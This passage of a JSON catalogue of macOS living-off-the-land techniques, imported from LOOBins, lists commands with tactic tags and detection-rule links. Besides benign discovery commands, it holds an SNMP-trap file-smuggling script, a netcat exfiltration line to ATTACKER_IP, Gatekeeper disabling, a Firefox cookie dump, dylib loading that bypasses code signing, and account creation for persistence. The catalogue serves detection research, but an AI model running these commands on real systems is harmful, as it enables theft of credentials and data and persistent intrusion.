then\n DATA=$(echo \"$line\" | sed 's/.*\"\\(.*\\)\"/\\1/')\n if [[ \"$DATA\" == FILENAME:* ]]; then\n FILENAME=\"${DATA#FILENAME:}\"\n echo \"$FILENAME\" > \"$STATE_FILE\"\n > \"${TRANSFER_DIR}/${FILENAME}.b64\"\n elif [[ \"$DATA\" == DATA:* ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n CHUNK=\"${DATA#DATA:}\"\n echo -n \"$CHUNK\" >> \"${TRANSFER_DIR}/${FILENAME}.b64\"\n fi\n elif [[ \"$DATA\" == \"END\" ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n base64 -D < \"${TRANSFER_DIR}/${FILENAME}.b64\" > \"${TRANSFER_DIR}/${FILENAME}\"\n echo \"MD5: $(md5 -q \"${TRANSFER_DIR}/${FILENAME}\")\"\n rm \"${TRANSFER_DIR}/${FILENAME}.b64\"\n rm \"$STATE_FILE\"\n fi\n fi\n fi\ndone\nEOF\nsudo chmod +x /usr/local/bin/trap_handler.sh\n\n# On receiver: configure snmptrapd to route traps to the handler and start it\nsudo tee /etc/snmp/snmptrapd.conf > /dev/null << 'EOF'\ndisableAuthorization yes\ntraphandle default /usr/local/bin/trap_handler.sh\nEOF\nsudo snmptrapd -f -Lo\n\n# On sender: transmit file in chunks\nFILE_PATH=\"/tmp/payload.sh\"\nRECEIVER_IP=\"<RECEIVER_IP>\"\nCHUNK_SIZE=1000\nBASE64_DATA=$(base64 < \"$FILE_PATH\")\nFILE_NAME=$(basename \"$FILE_PATH\")\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"FILENAME:$FILE_NAME\"\necho \"$BASE64_DATA\" | fold -w $CHUNK_SIZE | while read chunk; do\n snmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"DATA:$chunk\"\n sleep 0.1\ndone\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"END\"", 5880 "description": "This technique assumes both the sender and receiver are macOS hosts. Files are base64-encoded and sent as a sequence of SNMP traps carrying chunked data under a custom OID (1.3.6.1.4.1.99999). Three message types are used - FILENAME signals the start of a transfer, DATA carries each base64 chunk, and END triggers reassembly. snmptrapd on the receiver routes all traps to a handler script that writes, reassembles, and decodes the chunks using macOS-native base64 and md5 utilities. The resulting file is verified with an MD5 hash.", 5881 "mitre": [], 5882 "fullPath": [ 5883 "/usr/bin/snmptrap", 5884 "/usr/sbin/snmptrapd" 5885 ], 5886 "environment": [ 5887 "Local host" 5888 ], 5889 "availability": "Built in", 5890 "verification": "Upstream reference", 5891 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5892 "detection": [ 5893 { 5894 "type": "No detections at time of publishing", 5895 "value": "No detections at time of publishing" 5896 } 5897 ], 5898 "references": [ 5899 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/snmptrap.yml", 5900 "https://net-snmp.sourceforge.io/", 5901 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 5902 ] 5903 }, 5904 { 5905 "id": "loobins:softwareupdate:1588742f064e0e3f", 5906 "toolId": "loobins:softwareupdate", 5907 "toolName": "softwareupdate", 5908 "name": "Get OS and browser version information", 5909 "source": "LOOBins", 5910 "platform": [ 5911 "macOS" 5912 ], 5913 "capability": [ 5914 "Discovery" 5915 ], 5916 "nativeCategory": [ 5917 "Discovery" 5918 ], 5919 "command": "softwareupdate --list", 5920 "description": "Determine OS and Safari version by enumerating the available software updates.", 5921 "mitre": [], 5922 "fullPath": [ 5923 "/usr/sbin/softwareupdate" 5924 ], 5925 "environment": [ 5926 "Local host" 5927 ], 5928 "availability": "Built in", 5929 "verification": "Upstream reference", 5930 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5931 "detection": [ 5932 { 5933 "type": "No detections at time of publishing", 5934 "value": "No detections at time of publishing" 5935 } 5936 ], 5937 "references": [ 5938 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml", 5939 "https://ss64.com/osx/softwareupdate.html" 5940 ] 5941 }, 5942 { 5943 "id": "loobins:softwareupdate:231fbe890167d3a7", 5944 "toolId": "loobins:softwareupdate", 5945 "toolName": "softwareupdate", 5946 "name": "Get OS update policy", 5947 "source": "LOOBins", 5948 "platform": [ 5949 "macOS" 5950 ], 5951 "capability": [ 5952 "Discovery" 5953 ], 5954 "nativeCategory": [ 5955 "Discovery" 5956 ], 5957 "command": "softwareupdate --schedule", 5958 "description": "Use the --schedule flag to return the OS update policy.", 5959 "mitre": [], 5960 "fullPath": [ 5961 "/usr/sbin/softwareupdate" 5962 ], 5963 "environment": [ 5964 "Local host" 5965 ], 5966 "availability": "Built in", 5967 "verification": "Upstream reference", 5968 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 5969 "detection": [ 5970 { 5971 "type": "No detections at time of publishing", 5972 "value": "No detections at time of publishing" 5973 } 5974 ], 5975 "references": [ 5976 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml", 5977 "https://ss64.com/osx/softwareupdate.html" 5978 ] 5979 }, 5980 { 5981 "id": "loobins:spctl:843d31053bd2f21e", 5982 "toolId": "loobins:spctl", 5983 "toolName": "spctl", 5984 "name": "Disable Gatekeeper", 5985 "source": "LOOBins", 5986 "platform": [ 5987 "macOS" 5988 ], 5989 "capability": [ 5990 "Defense Evasion" 5991 ], 5992 "nativeCategory": [ 5993 "Defense Evasion" 5994 ], 5995 "command": "sudo spctl --master-disable", 5996 "description": "The --master-disable switch disables Gatekeeper. The command must be run with root/sudo permission.", 5997 "mitre": [], 5998 "fullPath": [ 5999 "/usr/sbin/spctl" 6000 ], 6001 "environment": [ 6002 "Local host" 6003 ], 6004 "availability": "Built in", 6005 "verification": "Upstream reference", 6006 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6007 "detection": [ 6008 { 6009 "type": "Elastic Detection Rules: Attempt to Disable Gatekeeper", 6010 "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml" 6011 }, 6012 { 6013 "type": "Sigma Rules: Disable Security Tools", 6014 "value": "https://github.com/SigmaHQ/sigma/blob/cd71edc09ca915f389e50df5b1bbb5ecd4b7f89d/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" 6015 } 6016 ], 6017 "references": [ 6018 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/spctl.yml", 6019 "https://disable-gatekeeper.github.io/" 6020 ] 6021 }, 6022 { 6023 "id": "loobins:sqlite3:06ae594029f6aa24", 6024 "toolId": "loobins:sqlite3", 6025 "toolName": "sqlite3", 6026 "name": "Get apps with Full Disk access", 6027 "source": "LOOBins", 6028 "platform": [ 6029 "macOS" 6030 ], 6031 "capability": [ 6032 "Discovery" 6033 ], 6034 "nativeCategory": [ 6035 "Discovery" 6036 ], 6037 "command": "sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \\\n'select client from access where auth_value and service = \"kTCCServiceSystemPolicyAllFiles\"'", 6038 "description": "The following command interacts with the TCC (Transparency, Consent, and Control) database to show the apps that have Full Disk access permission", 6039 "mitre": [], 6040 "fullPath": [ 6041 "/usr/bin/sqlite3" 6042 ], 6043 "environment": [ 6044 "Local host" 6045 ], 6046 "availability": "Built in", 6047 "verification": "Upstream reference", 6048 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6049 "detection": [ 6050 { 6051 "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", 6052 "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" 6053 }, 6054 { 6055 "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", 6056 "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" 6057 }, 6058 { 6059 "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", 6060 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" 6061 } 6062 ], 6063 "references": [ 6064 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", 6065 "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", 6066 "https://redcanary.com/blog/clipping-silver-sparrows-wings/" 6067 ] 6068 }, 6069 { 6070 "id": "loobins:sqlite3:b28bfa60a737df07", 6071 "toolId": "loobins:sqlite3", 6072 "toolName": "sqlite3", 6073 "name": "Get Firefox cookie data", 6074 "source": "LOOBins", 6075 "platform": [ 6076 "macOS" 6077 ], 6078 "capability": [ 6079 "Collection", 6080 "Credential Access" 6081 ], 6082 "nativeCategory": [ 6083 "Collection", 6084 "Credential Access" 6085 ], 6086 "command": "killall firefox; find ~/Library/Application\\ Support/Firefox/Profiles/. | grep cookies.sqlite | xargs -I {} sqlite3 {} \"select * from moz_cookies\"", 6087 "description": "The following one-liner can be used to kill Firefox and dump cookie data from the user's Firefox profile.", 6088 "mitre": [], 6089 "fullPath": [ 6090 "/usr/bin/sqlite3" 6091 ], 6092 "environment": [ 6093 "Local host" 6094 ], 6095 "availability": "Built in", 6096 "verification": "Upstream reference", 6097 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6098 "detection": [ 6099 { 6100 "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", 6101 "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" 6102 }, 6103 { 6104 "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", 6105 "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" 6106 }, 6107 { 6108 "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", 6109 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" 6110 } 6111 ], 6112 "references": [ 6113 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", 6114 "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", 6115 "https://redcanary.com/blog/clipping-silver-sparrows-wings/" 6116 ] 6117 }, 6118 { 6119 "id": "loobins:sqlite3:de4f81bf94a8b374", 6120 "toolId": "loobins:sqlite3", 6121 "toolName": "sqlite3", 6122 "name": "View URL associated with file downloads", 6123 "source": "LOOBins", 6124 "platform": [ 6125 "macOS" 6126 ], 6127 "capability": [ 6128 "Collection", 6129 "Credential Access" 6130 ], 6131 "nativeCategory": [ 6132 "Collection", 6133 "Credential Access" 6134 ], 6135 "command": "sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineDataURLString from LSQuarantineEvent'", 6136 "description": "The following sqlite command is commonly used by macOS malware to view the URL in which the payload was downloaded from.", 6137 "mitre": [], 6138 "fullPath": [ 6139 "/usr/bin/sqlite3" 6140 ], 6141 "environment": [ 6142 "Local host" 6143 ], 6144 "availability": "Built in", 6145 "verification": "Upstream reference", 6146 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6147 "detection": [ 6148 { 6149 "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", 6150 "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" 6151 }, 6152 { 6153 "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", 6154 "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" 6155 }, 6156 { 6157 "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", 6158 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" 6159 } 6160 ], 6161 "references": [ 6162 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", 6163 "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", 6164 "https://redcanary.com/blog/clipping-silver-sparrows-wings/" 6165 ] 6166 }, 6167 { 6168 "id": "loobins:ssh-keygen:09fc4639a16866cd", 6169 "toolId": "loobins:ssh-keygen", 6170 "toolName": "ssh-keygen", 6171 "name": "Execute malicious dynamic library (.dylib) from standard input", 6172 "source": "LOOBins", 6173 "platform": [ 6174 "macOS" 6175 ], 6176 "capability": [ 6177 "Execution", 6178 "Defense Evasion" 6179 ], 6180 "nativeCategory": [ 6181 "Execution", 6182 "Defense Evasion" 6183 ], 6184 "command": "ssh-keygen -D /private/tmp/evil.dylib", 6185 "description": "An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.", 6186 "mitre": [], 6187 "fullPath": [ 6188 "/usr/bin/ssh-keygen" 6189 ], 6190 "environment": [ 6191 "Local host" 6192 ], 6193 "availability": "Built in", 6194 "verification": "Upstream reference", 6195 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6196 "detection": [ 6197 { 6198 "type": "Recommendations included in resource below. No formal detection content at this time.", 6199 "value": "https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d" 6200 } 6201 ], 6202 "references": [ 6203 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ssh-keygen.yml", 6204 "https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d" 6205 ] 6206 }, 6207 { 6208 "id": "loobins:streamzip:d1107233f4c25cdc", 6209 "toolId": "loobins:streamzip", 6210 "toolName": "streamzip", 6211 "name": "Copy and compress sensitive data locally", 6212 "source": "LOOBins", 6213 "platform": [ 6214 "macOS" 6215 ], 6216 "capability": [ 6217 "Collection" 6218 ], 6219 "nativeCategory": [ 6220 "Collection", 6221 "Exfiltration" 6222 ], 6223 "command": "dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT", 6224 "description": "The following command reads file data and compresses the data for exfiltration", 6225 "mitre": [], 6226 "fullPath": [ 6227 "/usr/bin/streamzip" 6228 ], 6229 "environment": [ 6230 "Local host" 6231 ], 6232 "availability": "Built in", 6233 "verification": "Upstream reference", 6234 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6235 "detection": [ 6236 { 6237 "type": "No detection content at time of writing", 6238 "value": "No detection content at time of writing" 6239 } 6240 ], 6241 "references": [ 6242 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/streamzip.yml", 6243 "https://docs.oracle.com/cd/E88353_01/html/E37839/streamzip-1.html" 6244 ] 6245 }, 6246 { 6247 "id": "loobins:sw_vers:5efd19376b53fada", 6248 "toolId": "loobins:sw_vers", 6249 "toolName": "sw_vers", 6250 "name": "Retrieving macOS Version Information", 6251 "source": "LOOBins", 6252 "platform": [ 6253 "macOS" 6254 ], 6255 "capability": [ 6256 "Discovery" 6257 ], 6258 "nativeCategory": [ 6259 "Discovery" 6260 ], 6261 "command": "sw_vers", 6262 "description": "Fetch detailed macOS version information including the build version, product name, and product version.", 6263 "mitre": [], 6264 "fullPath": [ 6265 "/usr/bin/sw_vers" 6266 ], 6267 "environment": [ 6268 "Local host" 6269 ], 6270 "availability": "Built in", 6271 "verification": "Upstream reference", 6272 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6273 "detection": [ 6274 { 6275 "type": "No detections at time of publishing", 6276 "value": "No detections at time of publishing" 6277 } 6278 ], 6279 "references": [ 6280 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", 6281 "https://macosbin.com/bin/sw_vers", 6282 "https://ss64.com/osx/sw_vers.html" 6283 ] 6284 }, 6285 { 6286 "id": "loobins:sw_vers:6617de5f492de05f", 6287 "toolId": "loobins:sw_vers", 6288 "toolName": "sw_vers", 6289 "name": "Retrieving macOS Product Version", 6290 "source": "LOOBins", 6291 "platform": [ 6292 "macOS" 6293 ], 6294 "capability": [ 6295 "Discovery" 6296 ], 6297 "nativeCategory": [ 6298 "Discovery" 6299 ], 6300 "command": "sw_vers -productVersion", 6301 "description": "Fetch macOS product version.", 6302 "mitre": [], 6303 "fullPath": [ 6304 "/usr/bin/sw_vers" 6305 ], 6306 "environment": [ 6307 "Local host" 6308 ], 6309 "availability": "Built in", 6310 "verification": "Upstream reference", 6311 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6312 "detection": [ 6313 { 6314 "type": "No detections at time of publishing", 6315 "value": "No detections at time of publishing" 6316 } 6317 ], 6318 "references": [ 6319 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", 6320 "https://macosbin.com/bin/sw_vers", 6321 "https://ss64.com/osx/sw_vers.html" 6322 ] 6323 }, 6324 { 6325 "id": "loobins:sw_vers:b0419646786aaad1", 6326 "toolId": "loobins:sw_vers", 6327 "toolName": "sw_vers", 6328 "name": "Retrieving macOS Product Name", 6329 "source": "LOOBins", 6330 "platform": [ 6331 "macOS" 6332 ], 6333 "capability": [ 6334 "Discovery" 6335 ], 6336 "nativeCategory": [ 6337 "Discovery" 6338 ], 6339 "command": "sw_vers -productName", 6340 "description": "Fetch detailed macOS product name.", 6341 "mitre": [], 6342 "fullPath": [ 6343 "/usr/bin/sw_vers" 6344 ], 6345 "environment": [ 6346 "Local host" 6347 ], 6348 "availability": "Built in", 6349 "verification": "Upstream reference", 6350 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6351 "detection": [ 6352 { 6353 "type": "No detections at time of publishing", 6354 "value": "No detections at time of publishing" 6355 } 6356 ], 6357 "references": [ 6358 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", 6359 "https://macosbin.com/bin/sw_vers", 6360 "https://ss64.com/osx/sw_vers.html" 6361 ] 6362 }, 6363 { 6364 "id": "loobins:sw_vers:12adb0bc68d114b8", 6365 "toolId": "loobins:sw_vers", 6366 "toolName": "sw_vers", 6367 "name": "Retrieving macOS Build Version", 6368 "source": "LOOBins", 6369 "platform": [ 6370 "macOS" 6371 ], 6372 "capability": [ 6373 "Discovery" 6374 ], 6375 "nativeCategory": [ 6376 "Discovery" 6377 ], 6378 "command": "sw_vers -buildVersion", 6379 "description": "Fetch detailed macOS build version.", 6380 "mitre": [], 6381 "fullPath": [ 6382 "/usr/bin/sw_vers" 6383 ], 6384 "environment": [ 6385 "Local host" 6386 ], 6387 "availability": "Built in", 6388 "verification": "Upstream reference", 6389 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6390 "detection": [ 6391 { 6392 "type": "No detections at time of publishing", 6393 "value": "No detections at time of publishing" 6394 } 6395 ], 6396 "references": [ 6397 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", 6398 "https://macosbin.com/bin/sw_vers", 6399 "https://ss64.com/osx/sw_vers.html" 6400 ] 6401 }, 6402 { 6403 "id": "loobins:swift:db1eec9ae07ce64e", 6404 "toolId": "loobins:swift", 6405 "toolName": "swift", 6406 "name": "Execute Swift code file", 6407 "source": "LOOBins", 6408 "platform": [ 6409 "macOS" 6410 ], 6411 "capability": [ 6412 "Execution" 6413 ], 6414 "nativeCategory": [ 6415 "Execution" 6416 ], 6417 "command": "swift mycode.swift", 6418 "description": "Executes the Swift code that is in a .swift file", 6419 "mitre": [], 6420 "fullPath": [ 6421 "/usr/bin/swift" 6422 ], 6423 "environment": [ 6424 "Local host" 6425 ], 6426 "availability": "Built in", 6427 "verification": "Upstream reference", 6428 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6429 "detection": [ 6430 { 6431 "type": "Process & Command Line Argument Detection (process contains swift)", 6432 "value": "Process & Command Line Argument Detection (process contains swift)" 6433 }, 6434 { 6435 "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", 6436 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" 6437 } 6438 ], 6439 "references": [ 6440 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", 6441 "https://developer.apple.com/swift/blog/?id=18", 6442 "https://jblevins.org/log/swift", 6443 "https://krakendev.io/blog/scripting-in-swift", 6444 "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", 6445 "https://ed.com/command-line-swift/" 6446 ] 6447 }, 6448 { 6449 "id": "loobins:swift:4774f10c89e8cf8c", 6450 "toolId": "loobins:swift", 6451 "toolName": "swift", 6452 "name": "Execute Swift one-liner before swift 5.8 / Xcode 14.3 Beta 1", 6453 "source": "LOOBins", 6454 "platform": [ 6455 "macOS" 6456 ], 6457 "capability": [ 6458 "Execution", 6459 "Defense Evasion" 6460 ], 6461 "nativeCategory": [ 6462 "Execution", 6463 "Defense Evasion" 6464 ], 6465 "command": "echo 'print(\"loobins\")' | swift -", 6466 "description": "Executes a Swift one-liner by piping an echoed string into the swift command", 6467 "mitre": [], 6468 "fullPath": [ 6469 "/usr/bin/swift" 6470 ], 6471 "environment": [ 6472 "Local host" 6473 ], 6474 "availability": "Built in", 6475 "verification": "Upstream reference", 6476 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6477 "detection": [ 6478 { 6479 "type": "Process & Command Line Argument Detection (process contains swift)", 6480 "value": "Process & Command Line Argument Detection (process contains swift)" 6481 }, 6482 { 6483 "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", 6484 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" 6485 } 6486 ], 6487 "references": [ 6488 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", 6489 "https://developer.apple.com/swift/blog/?id=18", 6490 "https://jblevins.org/log/swift", 6491 "https://krakendev.io/blog/scripting-in-swift", 6492 "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", 6493 "https://ed.com/command-line-swift/" 6494 ] 6495 }, 6496 { 6497 "id": "loobins:swift:1d38d36cc5bfdc09", 6498 "toolId": "loobins:swift", 6499 "toolName": "swift", 6500 "name": "Execute Swift one-liner with swift 5.8 / Xcode 14.3 Beta 1 or greater", 6501 "source": "LOOBins", 6502 "platform": [ 6503 "macOS" 6504 ], 6505 "capability": [ 6506 "Execution", 6507 "Defense Evasion" 6508 ], 6509 "nativeCategory": [ 6510 "Execution", 6511 "Defense Evasion" 6512 ], 6513 "command": "swift -e 'import Foundation; let process = Process(); process.executableURL = URL(fileURLWithPath:\"/bin/bash\"); process.arguments = [\"-c\", \"ls -alh\"]; let stdout = Pipe(); let stderr = Pipe(); process.standardOutput = stdout; process.standardError = stderr; try process.run(); print(String(decoding: stdout.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self)); print(String(decoding: stderr.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self));'", 6514 "description": "Executes a Swift one-liner that executes the ls command to list the current directory using the -e option that was implemented in swift 5.8 / Xcode 14.3 Beta 1", 6515 "mitre": [], 6516 "fullPath": [ 6517 "/usr/bin/swift" 6518 ], 6519 "environment": [ 6520 "Local host" 6521 ], 6522 "availability": "Built in", 6523 "verification": "Upstream reference", 6524 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6525 "detection": [ 6526 { 6527 "type": "Process & Command Line Argument Detection (process contains swift)", 6528 "value": "Process & Command Line Argument Detection (process contains swift)" 6529 }, 6530 { 6531 "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", 6532 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" 6533 } 6534 ], 6535 "references": [ 6536 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", 6537 "https://developer.apple.com/swift/blog/?id=18", 6538 "https://jblevins.org/log/swift", 6539 "https://krakendev.io/blog/scripting-in-swift", 6540 "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", 6541 "https://ed.com/command-line-swift/" 6542 ] 6543 }, 6544 { 6545 "id": "loobins:sysadminctl:b115efd1e19c6561", 6546 "toolId": "loobins:sysadminctl", 6547 "toolName": "sysadminctl", 6548 "name": "Enable Guest Account", 6549 "source": "LOOBins", 6550 "platform": [ 6551 "macOS" 6552 ], 6553 "capability": [], 6554 "nativeCategory": [ 6555 "Initial Access" 6556 ], 6557 "command": "sudo sysadminctl -guestAccount on", 6558 "description": "sysadminctl can be used to enable the guest account", 6559 "mitre": [], 6560 "fullPath": [ 6561 "/usr/sbin/sysadminctl" 6562 ], 6563 "environment": [ 6564 "Local host" 6565 ], 6566 "availability": "Built in", 6567 "verification": "Upstream reference", 6568 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6569 "detection": [ 6570 { 6571 "type": "Sigma: Creation Of A Local User Account", 6572 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6573 }, 6574 { 6575 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6576 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6577 }, 6578 { 6579 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6580 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6581 } 6582 ], 6583 "references": [ 6584 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6585 "https://ss64.com/mac/sysadminctl.html" 6586 ] 6587 }, 6588 { 6589 "id": "loobins:sysadminctl:08b699f562d93afa", 6590 "toolId": "loobins:sysadminctl", 6591 "toolName": "sysadminctl", 6592 "name": "Create Local User Account", 6593 "source": "LOOBins", 6594 "platform": [ 6595 "macOS" 6596 ], 6597 "capability": [ 6598 "Persistence" 6599 ], 6600 "nativeCategory": [ 6601 "Persistence" 6602 ], 6603 "command": "sudo sysadminctl -addUser randomUser -password \"randomPassword\"", 6604 "description": "sysadminctl can be used to create a local user account", 6605 "mitre": [], 6606 "fullPath": [ 6607 "/usr/sbin/sysadminctl" 6608 ], 6609 "environment": [ 6610 "Local host" 6611 ], 6612 "availability": "Built in", 6613 "verification": "Upstream reference", 6614 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6615 "detection": [ 6616 { 6617 "type": "Sigma: Creation Of A Local User Account", 6618 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6619 }, 6620 { 6621 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6622 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6623 }, 6624 { 6625 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6626 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6627 } 6628 ], 6629 "references": [ 6630 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6631 "https://ss64.com/mac/sysadminctl.html" 6632 ] 6633 }, 6634 { 6635 "id": "loobins:sysadminctl:5ac210cb243ba82b", 6636 "toolId": "loobins:sysadminctl", 6637 "toolName": "sysadminctl", 6638 "name": "Create a Local Admin Account", 6639 "source": "LOOBins", 6640 "platform": [ 6641 "macOS" 6642 ], 6643 "capability": [ 6644 "Persistence" 6645 ], 6646 "nativeCategory": [ 6647 "Persistence" 6648 ], 6649 "command": "sudo sysadminctl -addUser randomUser -password \"randomPassword\" 